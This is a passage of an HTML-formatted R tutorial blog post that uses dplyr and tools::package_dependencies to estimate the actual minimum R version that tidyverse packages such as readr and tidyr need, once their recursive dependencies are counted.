&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(depend_version &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;if_else&lt;/span&gt;(depend_package &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;R&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;clean_r_ver&lt;/span&gt;(depend_version),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; depend_version))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Standardise column names&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;colnames&lt;/span&gt;(av_pkgs) &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_to_lower&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;colnames&lt;/span&gt;(av_pkgs))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;After this step, we now have tibble with tidy columns:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;av_pkgs &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(package, depend_type, depend_package, depend_version, depend_condition) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;slice&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 4 x 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## package depend_type depend_package depend_version depend_condition&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 A3 Depends R 2.15.0 &amp;gt;=&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 abbyyR Depends R 3.2.0 &amp;gt;=&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 abc Depends R 2.10.0 &amp;gt;=&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 abc.data Depends R 2.10.0 &amp;gt;=&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and we can see minimum R version the package authors have indicated for their package. &lt;strong&gt;However&lt;/strong&gt;, this isn’t the minimum version required. Each package imports a number of other packages, e.g. the {readr} imports 4 packages&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;av_pkgs &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(package &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;readr&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&lt;/span&gt; depend_type &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Imports&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(depend_package) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;pull&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;Rcpp&amp;#34; &amp;#34;tibble&amp;#34; &amp;#34;hms&amp;#34; &amp;#34;R6&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and each of those packages, also import other packages. Clearly, the minimum version required to install {dplyr} is the maximum R version of all imported packages&lt;/p&gt;
&lt;h3 id="some-interesting-things"&gt;Some interesting things&lt;/h3&gt;
&lt;p&gt;Before we work out the maximum R version for each set of imports, we should first investigate how many imports each package using a bit of {dplyr}&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;imp &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; av_pkgs &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(package, depend_type) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;summarise&lt;/span&gt;(n &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;length&lt;/span&gt;(depend_package)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(package, n) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(depend_type &lt;span style="color:#ff7b72;font-weight:bold"&gt;!=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Enhances&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&lt;/span&gt; depend_type &lt;span style="color:#ff7b72;font-weight:bold"&gt;!=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;LinkingTo&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;imp &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(depend_type) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;summarise&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;mean&lt;/span&gt;(n))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 3 x 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## depend_type `mean(n)`&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 Depends 1.96&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 Imports 4.98&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 Suggests 3.63&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Using histograms we get a better idea of the overall numbers. Note that here we’re using the ipsum theme from the {hrbrthemes} package.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(hrbrthemes)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(imp, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(n)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_histogram&lt;/span&gt;(binwidth &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, colour&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;white&amp;#34;&lt;/span&gt;, fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;steelblue&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;facet_wrap&lt;/span&gt;(&lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;depend_type) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;xlim&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;25&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ylim&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;6000&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_ipsum&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(x&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;No. of packages&amp;#34;&lt;/span&gt;, y&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Frequency&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Package dependencies&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; subtitle&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;An average of 5 imports per package&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; caption&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Rivers&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="featured.jpg" style="width:650px; class:image-center"&gt;
&lt;h2 id="maximum-overall-imports"&gt;Maximum overall imports&lt;/h2&gt;
&lt;p&gt;As I’ve mentioned, we need to obtain not just the imported packages, but also their dependencies. Fortunately, the {tools} package comes to our rescue,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tools&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;package_dependencies&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;readr&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; which &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Depends&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Imports&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;LinkingTo&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; recursive &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unlist&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unname&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;Rcpp&amp;#34; &amp;#34;tibble&amp;#34; &amp;#34;hms&amp;#34; &amp;#34;R6&amp;#34; &amp;#34;BH&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [6] &amp;#34;methods&amp;#34; &amp;#34;pkgconfig&amp;#34; &amp;#34;rlang&amp;#34; &amp;#34;utils&amp;#34; &amp;#34;cli&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [11] &amp;#34;crayon&amp;#34; &amp;#34;pillar&amp;#34; &amp;#34;assertthat&amp;#34; &amp;#34;grDevices&amp;#34; &amp;#34;fansi&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [16] &amp;#34;utf8&amp;#34; &amp;#34;tools&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Using the &lt;code&gt;package_dependencies()&lt;/code&gt; function, we simply&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Obtain a list of dependencies for a given package&lt;/li&gt;
&lt;li&gt;Extract the maximum version of R for all packages in the list&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;At the end of this post, there are two helper functions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;max_r_version()&lt;/code&gt; - takes a vector of R versions, and returns a maximum version. E.g.
&lt;pre tabindex="0"&gt;&lt;code&gt;max_r_version(c(&amp;#34;3.2.0&amp;#34;, &amp;#34;3.3.2&amp;#34;, &amp;#34;3.2.0&amp;#34;))
## 3.3.2
&lt;/code&gt;&lt;/pre&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;get_r_ver()&lt;/code&gt; - calls &lt;code&gt;package_dependencies()&lt;/code&gt; and returns the maximum R version out of all of the dependencies.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Also, we have simplified some the details and what we&amp;rsquo;ve done isn&amp;rsquo;t quite right - it&amp;rsquo;s more of a first approximation. See the end of the post for details&lt;/p&gt;
&lt;p&gt;Now that’s done, we can pass the list of {tidyverse} packages then compare their stated R version, with the actual required R version&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Here we are using just the tidyverse&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# But this works with any packages&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tidy &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;map_dfr&lt;/span&gt;(tidy_pkgs, get_r_ver, av_pkgs) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(package) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;slice&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(package, r_real, r_cur)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We then select the packages where there is a difference&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tidy &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(r_real &lt;span style="color:#ff7b72;font-weight:bold"&gt;!=&lt;/span&gt; r_cur &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&lt;/span&gt; (&lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.na&lt;/span&gt;(r_real) &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.na&lt;/span&gt;(r_cur)))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# A tibble: 3 x 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Groups: package [3]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; package r_real r_cur
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;chr&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;chr&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;chr&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; readr &lt;span style="color:#a5d6ff"&gt;3.1.0&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3.0.2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; tidyr &lt;span style="color:#a5d6ff"&gt;3.1.2&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3.1.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The largest difference in R versions is for {readr} (which feeds into the {tidyverse}). {readr} claims to only need R version 3.0.2 but a bit more investigation shows that {readr} depends on the tibble package which is version 3.1.0. &lt;strong&gt;Although&lt;/strong&gt;, it is worth noting that 3.1.0 is fairly old!&lt;/p&gt;
&lt;h2 id="take-away-lessons"&gt;Take away lessons&lt;/h2&gt;
&lt;p&gt;The takeaway message is that dependencies matter. A single change affects everything in the package dependency tree. The other lesson is that the tidyverse team have been very &lt;strong&gt;careful&lt;/strong&gt; about there dependencies. In fact, all of their packages are checked on R 3.1, 3.2, &amp;hellip;, devel&lt;/p&gt;
&lt;h2 id="simplifications-skipping-package-versions"&gt;Simplifications: skipping package versions&lt;/h2&gt;
&lt;p&gt;In this analysis, we&amp;rsquo;ve completely ignored version numbers and always assumed we need the latest version of a package. This clearly isn&amp;rsquo;t correct. So to do this analysis properly, we would need the historical DESCRIPTION files for packages and use that to determine versions.&lt;/p&gt;
&lt;p&gt;Thanks to Jim Hester who spotted an error in a previous version of this post.&lt;/p&gt;
&lt;hr&gt;
&lt;h3 id="functions"&gt;Functions&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;clean_dependencies &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(av_pkgs, type) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; no_of_cols &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;max&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_count&lt;/span&gt;(av_pkgs[[type]], &lt;span style="color:#a5d6ff"&gt;&amp;#34;,&amp;#34;&lt;/span&gt;), na.rm &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; cols &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(type, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;seq_len&lt;/span&gt;(no_of_cols))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; av_clean &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; av_pkgs &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;separate&lt;/span&gt;(type, sep &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;,&amp;#34;&lt;/span&gt;, into &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; cols, fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;right&amp;#34;&lt;/span&gt;, remove &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;gather&lt;/span&gt;(key &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; type, pkg, cols) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
